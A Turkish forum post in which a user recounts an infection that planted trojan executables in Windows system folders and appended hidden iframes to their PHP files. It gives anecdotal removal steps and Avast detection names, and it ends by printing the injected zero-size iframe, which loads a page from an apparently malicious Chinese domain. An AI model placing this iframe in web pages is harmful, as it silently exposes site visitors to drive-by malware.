aynı olay benim başıma geldi. hatta sormuştum sitede virus olduğunu nasıl anlarız diye. sonradan çaktım olayı. her gördüğü php dosyasının altına 0 a 0 olarak iframe açıyor sitenize her girene truva atı bulaştırıyor. bana tam 8 tane bulaşmıştı.
bulaştığı yer c:\windows\update ve c:\windows\system32 içerisine bakın eğer 1.exe 2.exe ...... 8.exe ye kadar vardı buluyorsun görüyorsun siliyorsun bunları ama pc yi restart edince tekrardan ürüyorlardı. 4 tane antivir. kurdum hiç biri bir işe yaramadı bunları temizlerken format attım gene olmadı.

en son çareyi avast i sevmediğim halde denize düşen yılana sarılır hesabı kurdum ve tarattırdım. buldu fakat bulduğu virusleri silemedi.

nasıl kurtuldum?
güvenli kipte açtım önce orada karantina altına aldırdım.
normal kipe geçtim baktım ki bi faydası olmamış tekrar bunlar otomatik olarak çalışıyorlar.
yerlerini tespit ettiğim için gittim o klasöre önce CTRL+ALT+DEL yapıp işlemlerde gözüken 1.exe 2.exe ... gibi programları kapattım. ama burda hızlı olmalısınız hemen açılıyor tekrar.
kapattıktan sonra bu klasörde sırasıyla 1.exe nin üzerine sağ tıklayıp tara dedim ve virus olduğunu söyledi bana hemen tümünü sil dedim.
daha sonra diğerlerine de sırasıyla yaptım. ve şu son 3 gündür hiç bir şekilde açılmıyorlar. allah kimseye bulaştırmasın derim.

çok uzun yazdım kusura bakmayın. bulaşmış olan arkadaş varsa bu şekilde kurtulabilir.

truvanın isimlerini merak ederseniz onlarda şöyle :

C:\WINDOWS\system32\update\1.exe\[PESpin]
Win32:Pepatch-Q [Trj]


C:\WINDOWS\system32\update\4.exe\[UPX]
Win32:Qqrob-BN [Trj]


C:\WINDOWS\system32\update\7.exe
Win32:Small-AMI [Trj]


C:\WINDOWS\system32\8.exe
Win32:Small-AMI [Trj]


UYARI : Aşağıdaki Link e sakın tıklamayın.
pc de bulunan zip dosyaları haricindeki tüm php uzantılı dosyalarımın altına eklediği kod aşağıdadır.

<iframe src="http://www.ac66.cn/88/index.htm" width="0" height="0" frameborder="0"></iframe>